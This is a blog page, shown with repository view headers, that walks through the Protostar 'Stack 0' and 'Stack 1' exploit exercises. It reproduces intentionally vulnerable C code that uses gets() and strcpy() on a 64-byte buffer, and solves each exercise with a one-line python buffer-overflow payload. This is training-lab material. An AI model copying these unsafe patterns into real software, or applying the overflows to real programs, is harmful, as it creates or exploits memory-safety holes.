paulwalko.github.io/_site/writeup/nebula_exploit_exercises.html

272 lines
10 KiB
HTML
Raw Normal View History

2016-06-15 00:03:17 -04:00
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
2016-06-15 01:06:03 -04:00
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
2016-06-15 00:03:17 -04:00
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
2016-06-15 01:06:03 -04:00
<title>Protostar Exploit Exercises Solutions 0-1</title>
2016-06-15 00:03:17 -04:00
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="http://paul.walko.org/favicon/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="http://paul.walko.org/favicon/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="http://paul.walko.org/favicon/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="http://paul.walko.org/favicon/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="http://paul.walko.org/favicon/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="http://paul.walko.org/favicon/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="http://paul.walko.org/favicon/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="http://paul.walko.org/favicon/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="http://paul.walko.org/favicon/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="http://paul.walko.org/favicon/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="http://paul.walko.org/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="http://paul.walko.org/favicon/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="http://paul.walko.org/favicon/favicon-16x16.png">
<link rel="manifest" href="http://paul.walko.org/favicon/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="stylesheet" type="text/css" href="http://paul.walko.org/stylesheets/base.css">
<link rel="stylesheet" type="text/css" href="http://paul.walko.org/stylesheets/simplePagination.css">
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
2016-06-15 01:06:03 -04:00
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
2016-06-15 00:03:17 -04:00
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://paul.walko.org/stylesheets/markdownreader.css">
<link rel="stylesheet" type="text/css" href="http://paul.walko.org/stylesheets/pygments_monokai.css">
<link rel="stylesheet" type="text/css" href="http://paul.walko.org/stylesheets/code_block.css">
</head>
<body>
<header id="l-header">
<div class="container">
<div class="row logo">
<div class="col-lg-7">
<h1>Paul Walko</h1>
</div>
</div>
<div class="row navicon">
<a href=""><i class="fa fa-navicon"></i></a>
</div>
<div class="row navbar">
<nav class="col-lg-8 col-md-8 col-xs-12">
<ul class="row">
<li class="col-lg-3"><a href="http://paul.walko.org/">HOME</a></li>
<li class="col-lg-3">
<ul class="subnav">
<a href="javascript:void(0)">POSTS</a>
<li><a href="http://paul.walko.org/category">CATEGORY</a></li>
<li><a href="http://paul.walko.org/tag">TAG</a></li>
</ul>
</li>
<li class="col-lg-3"><a href="http://paul.walko.org/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
<div class="search col-lg-4 col-md-4 col-xs-12">
<form id="dummySearch">
<label for="search"></label>
<input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
<i class="fa fa-search"></i>
</form>
<script>
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
2016-06-15 01:06:03 -04:00
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
2016-06-15 00:03:17 -04:00
location.href = url;
})
})
</script>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
2016-06-15 01:06:03 -04:00
<p id="postTitle">Protostar Exploit Exercises Solutions 0-1</p>
2016-06-15 00:03:17 -04:00
<ul class="tags clearfix">
<li><i class="fa fa-tag"></i> exploit-exercises</li>
<li><i class="fa fa-tag"></i> protostar</li>
<li><i class="fa fa-tag"></i> hacking</li>
</ul>
<p id="postMeta">posted on 14 Jun 2016 under category <a href="http://paul.walko.org/category/">writeup</a></p>
</header>
2016-06-15 01:06:03 -04:00
<h1 id="stack-0">Stack 0</h1>
<p>Heres what were given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
</code></pre>
</div>
<p>The first thing I took note of is the size of the <code class="highlighter-rouge">buffer</code>: 64 bytes. After that, the program inputs text for <code class="highlighter-rouge">buffer</code>, and then checks to see if you modified the <code class="highlighter-rouge">modified</code> variable.
Im guessing if I put in a string longer than 64 bytes it will work. Lets see:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
</code></pre>
</div>
<p>That works as expected, now with 65 bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
</code></pre>
</div>
<p>Solved!</p>
<h1 id="stack-1">Stack 1</h1>
<p>Heres the code were given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
</code></pre>
</div>
<p>Just like Stack 0, were given a <code class="highlighter-rouge">buffer</code> array size 64 bytes and were also asked to input the contents of it. Except it looks like modified has to equal <code class="highlighter-rouge">0x61626364</code> instead of just changing it like before.</p>
<p>Keep in mind this is <a href="https://en.wikipedia.org/wiki/Endianness">little endian</a>, so Ill input the value in reverse order:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
</code></pre>
</div>
<p>That works as expected, now with the additional bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
</code></pre>
</div>
<p>Woo!</p>
2016-06-15 00:03:17 -04:00
</div>
<div id="markdown-outline" class="col-lg-3">
</div>
<div id="disqus_thread"></div>
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
<footer id="l-footer">
<div class="container">
<div class="row">
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
<h3>CONTACT</h3>
<div class="row">
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
United States<br>
Paul Walko<br>
</address>
<ul class="col-lg-6 col-md-6 col-sm-6">
<li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> &nbsp;&nbsp;paulsw.pw@gmail.com</a></li>
<li class="github"><i class="fa fa-github"></i> <a href="https://www.github.com/paulwalko"> &nbsp;&nbsp;https://www.github.com/paulwalko</a></li>
</ul>
</div>
</div>
</div>
<p id="legal">
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; built by <a href="http://unifreak.github.io">UniFreak</a>
</p>
</div>
</footer>
<script type="text/javascript" src="http://paul.walko.org/javascripts/base.js"></script>
<script type="text/javascript" src="http://paul.walko.org/javascripts/markdownreader.js"></script>
</body>
</html>